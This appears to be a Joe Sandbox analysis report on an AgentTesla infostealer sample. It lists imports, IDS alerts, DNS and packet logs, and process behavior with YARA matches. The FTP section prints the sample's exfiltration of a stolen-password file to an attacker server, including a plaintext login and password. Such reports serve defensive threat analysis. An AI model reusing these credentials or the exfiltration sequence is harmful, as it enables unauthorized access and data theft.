                                  RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                  RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                  RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                  RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                  RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                  RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                  RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                  RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                  RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                  RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                  RT_RCDATA0xcc7b80x2b388data1.0003445704731349
                                  RT_GROUP_ICON0xf7b400x76dataEnglishGreat Britain0.6610169491525424
                                  RT_GROUP_ICON0xf7bb80x14dataEnglishGreat Britain1.25
                                  RT_GROUP_ICON0xf7bcc0x14dataEnglishGreat Britain1.15
                                  RT_GROUP_ICON0xf7be00x14dataEnglishGreat Britain1.25
                                  RT_VERSION0xf7bf40xdcdataEnglishGreat Britain0.6181818181818182
                                  RT_MANIFEST0xf7cd00x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                  Imports

                                  DLLImport
                                  KERNEL32.DLLHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                  ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                  COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                  GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                  OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                  PSAPI.DLLGetProcessMemoryInfo
                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                  USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                  USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                  UxTheme.dllIsThemeActive
                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                  WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishGreat Britain

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2025-01-11T03:19:36.997199+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.549708162.241.62.6321TCP
                                  2025-01-11T03:19:37.399129+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549714162.241.62.6335211TCP
                                  2025-01-11T03:19:37.404623+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549714162.241.62.6335211TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 11, 2025 03:19:21.069190979 CET4970480192.168.2.5208.95.112.1
                                  Jan 11, 2025 03:19:21.074932098 CET8049704208.95.112.1192.168.2.5
                                  Jan 11, 2025 03:19:21.075017929 CET4970480192.168.2.5208.95.112.1
                                  Jan 11, 2025 03:19:21.125785112 CET4970480192.168.2.5208.95.112.1
                                  Jan 11, 2025 03:19:21.130615950 CET8049704208.95.112.1192.168.2.5
                                  Jan 11, 2025 03:19:21.539477110 CET8049704208.95.112.1192.168.2.5
                                  Jan 11, 2025 03:19:21.584115028 CET4970480192.168.2.5208.95.112.1
                                  Jan 11, 2025 03:19:22.438273907 CET4970521192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:22.443115950 CET2149705162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:22.443197966 CET4970521192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:22.447863102 CET4970521192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:22.452739954 CET2149705162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:22.453052998 CET4970521192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:34.430327892 CET4970680192.168.2.5208.95.112.1
                                  Jan 11, 2025 03:19:34.435302019 CET8049706208.95.112.1192.168.2.5
                                  Jan 11, 2025 03:19:34.435379982 CET4970680192.168.2.5208.95.112.1
                                  Jan 11, 2025 03:19:34.435643911 CET4970680192.168.2.5208.95.112.1
                                  Jan 11, 2025 03:19:34.440450907 CET8049706208.95.112.1192.168.2.5
                                  Jan 11, 2025 03:19:34.901218891 CET8049706208.95.112.1192.168.2.5
                                  Jan 11, 2025 03:19:34.943470001 CET4970680192.168.2.5208.95.112.1
                                  Jan 11, 2025 03:19:35.519659042 CET4970480192.168.2.5208.95.112.1
                                  Jan 11, 2025 03:19:35.676239967 CET4970821192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:35.683115005 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:35.683219910 CET4970821192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:36.204338074 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.204663038 CET4970821192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:36.209644079 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.322186947 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.322351933 CET4970821192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:36.327208996 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.524321079 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.524527073 CET4970821192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:36.529354095 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.639661074 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.639903069 CET4970821192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:36.644772053 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.755359888 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.755621910 CET4970821192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:36.760557890 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.871170998 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.871402025 CET4970821192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:36.876176119 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.986709118 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.991940975 CET4971435211192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:36.996898890 CET3521149714162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:36.996992111 CET4971435211192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:36.997199059 CET4970821192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:37.002059937 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:37.398741007 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:37.399128914 CET4971435211192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:37.399223089 CET4971435211192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:37.403984070 CET3521149714162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:37.404194117 CET3521149714162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:37.404623032 CET4971435211192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:37.443487883 CET4970821192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:19:37.531800985 CET2149708162.241.62.63192.168.2.5
                                  Jan 11, 2025 03:19:37.584084988 CET4970821192.168.2.5162.241.62.63
                                  Jan 11, 2025 03:20:25.678092957 CET4970680192.168.2.5208.95.112.1
                                  Jan 11, 2025 03:20:25.683406115 CET8049706208.95.112.1192.168.2.5
                                  Jan 11, 2025 03:20:25.683507919 CET4970680192.168.2.5208.95.112.1

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 11, 2025 03:19:21.056025982 CET6057953192.168.2.51.1.1.1
                                  Jan 11, 2025 03:19:21.064203978 CET53605791.1.1.1192.168.2.5
                                  Jan 11, 2025 03:19:22.119621038 CET5933853192.168.2.51.1.1.1
                                  Jan 11, 2025 03:19:22.437109947 CET53593381.1.1.1192.168.2.5

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jan 11, 2025 03:19:21.056025982 CET192.168.2.51.1.1.10x1f77Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                  Jan 11, 2025 03:19:22.119621038 CET192.168.2.51.1.1.10x7b6Standard query (0)ftp.antoniomayol.comA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jan 11, 2025 03:19:21.064203978 CET1.1.1.1192.168.2.50x1f77No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                  Jan 11, 2025 03:19:22.437109947 CET1.1.1.1192.168.2.50x7b6No error (0)ftp.antoniomayol.comantoniomayol.comCNAME (Canonical name)IN (0x0001)false
                                  Jan 11, 2025 03:19:22.437109947 CET1.1.1.1192.168.2.50x7b6No error (0)antoniomayol.com162.241.62.63A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • ip-api.com

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549704208.95.112.1805728C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  TimestampBytes transferredDirectionData
                                  Jan 11, 2025 03:19:21.125785112 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                  Host: ip-api.com
                                  Connection: Keep-Alive
                                  Jan 11, 2025 03:19:21.539477110 CET175INHTTP/1.1 200 OK
                                  Date: Sat, 11 Jan 2025 02:19:21 GMT
                                  Content-Type: text/plain; charset=utf-8
                                  Content-Length: 6
                                  Access-Control-Allow-Origin: *
                                  X-Ttl: 60
                                  X-Rl: 44
                                  Data Raw: 66 61 6c 73 65 0a
                                  Data Ascii: false


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.549706208.95.112.1806520C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  TimestampBytes transferredDirectionData
                                  Jan 11, 2025 03:19:34.435643911 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                  Host: ip-api.com
                                  Connection: Keep-Alive
                                  Jan 11, 2025 03:19:34.901218891 CET175INHTTP/1.1 200 OK
                                  Date: Sat, 11 Jan 2025 02:19:34 GMT
                                  Content-Type: text/plain; charset=utf-8
                                  Content-Length: 6
                                  Access-Control-Allow-Origin: *
                                  X-Ttl: 46
                                  X-Rl: 43
                                  Data Raw: 66 61 6c 73 65 0a
                                  Data Ascii: false


                                  FTP Packets

                                  TimestampSource PortDest PortSource IPDest IPCommands
                                  Jan 11, 2025 03:19:36.204338074 CET2149708162.241.62.63192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 20:19. Server port: 21.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 20:19. Server port: 21.220-IPv6 connections are also welcome on this server.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 20:19. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                  Jan 11, 2025 03:19:36.204663038 CET4970821192.168.2.5162.241.62.63USER johnson@antoniomayol.com
                                  Jan 11, 2025 03:19:36.322186947 CET2149708162.241.62.63192.168.2.5331 User johnson@antoniomayol.com OK. Password required
                                  Jan 11, 2025 03:19:36.322351933 CET4970821192.168.2.5162.241.62.63PASS cMhKDQUk1{;%
                                  Jan 11, 2025 03:19:36.524321079 CET2149708162.241.62.63192.168.2.5230-OK. Current restricted directory is /
                                  230-OK. Current restricted directory is /230 28 Kbytes used (0%) - authorized: 2048000 Kb
                                  Jan 11, 2025 03:19:36.639661074 CET2149708162.241.62.63192.168.2.5504 Unknown command
                                  Jan 11, 2025 03:19:36.639903069 CET4970821192.168.2.5162.241.62.63PWD
                                  Jan 11, 2025 03:19:36.755359888 CET2149708162.241.62.63192.168.2.5257 "/" is your current location
                                  Jan 11, 2025 03:19:36.755621910 CET4970821192.168.2.5162.241.62.63TYPE I
                                  Jan 11, 2025 03:19:36.871170998 CET2149708162.241.62.63192.168.2.5200 TYPE is now 8-bit binary
                                  Jan 11, 2025 03:19:36.871402025 CET4970821192.168.2.5162.241.62.63PASV
                                  Jan 11, 2025 03:19:36.986709118 CET2149708162.241.62.63192.168.2.5227 Entering Passive Mode (162,241,62,63,137,139)
                                  Jan 11, 2025 03:19:36.997199059 CET4970821192.168.2.5162.241.62.63STOR PW_user-374653_2025_01_10_21_19_34.html
                                  Jan 11, 2025 03:19:37.398741007 CET2149708162.241.62.63192.168.2.5150 Accepted data connection
                                  Jan 11, 2025 03:19:37.531800985 CET2149708162.241.62.63192.168.2.5226-28 Kbytes used (0%) - authorized: 2048000 Kb
                                  226-28 Kbytes used (0%) - authorized: 2048000 Kb226-File successfully transferred
                                  226-28 Kbytes used (0%) - authorized: 2048000 Kb226-File successfully transferred226 0.117 seconds (measured here), 2.68 Kbytes per second

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:21:19:17
                                  Start date:10/01/2025
                                  Path:C:\Users\user\Desktop\RHOqJ5BrHW.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\RHOqJ5BrHW.exe"
                                  Imagebase:0x980000
                                  File size:1'036'800 bytes
                                  MD5 hash:BC7FEE37D8D779B635750BCE96B9ECD9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:21:19:18
                                  Start date:10/01/2025
                                  Path:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\RHOqJ5BrHW.exe"
                                  Imagebase:0x420000
                                  File size:1'036'800 bytes
                                  MD5 hash:BC7FEE37D8D779B635750BCE96B9ECD9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 58%, ReversingLabs
                                  • Detection: 62%, Virustotal, Browse
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:21:19:19
                                  Start date:10/01/2025
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\RHOqJ5BrHW.exe"
                                  Imagebase:0x680000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2202546408.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2202546408.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:21:19:30
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs"
                                  Imagebase:0x7ff65cfc0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:5
                                  Start time:21:19:31
                                  Start date:10/01/2025
                                  Path:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                                  Imagebase:0x420000
                                  File size:1'036'800 bytes
                                  MD5 hash:BC7FEE37D8D779B635750BCE96B9ECD9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:21:19:32
                                  Start date:10/01/2025
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                                  Imagebase:0xd70000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4495084882.0000000003016000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
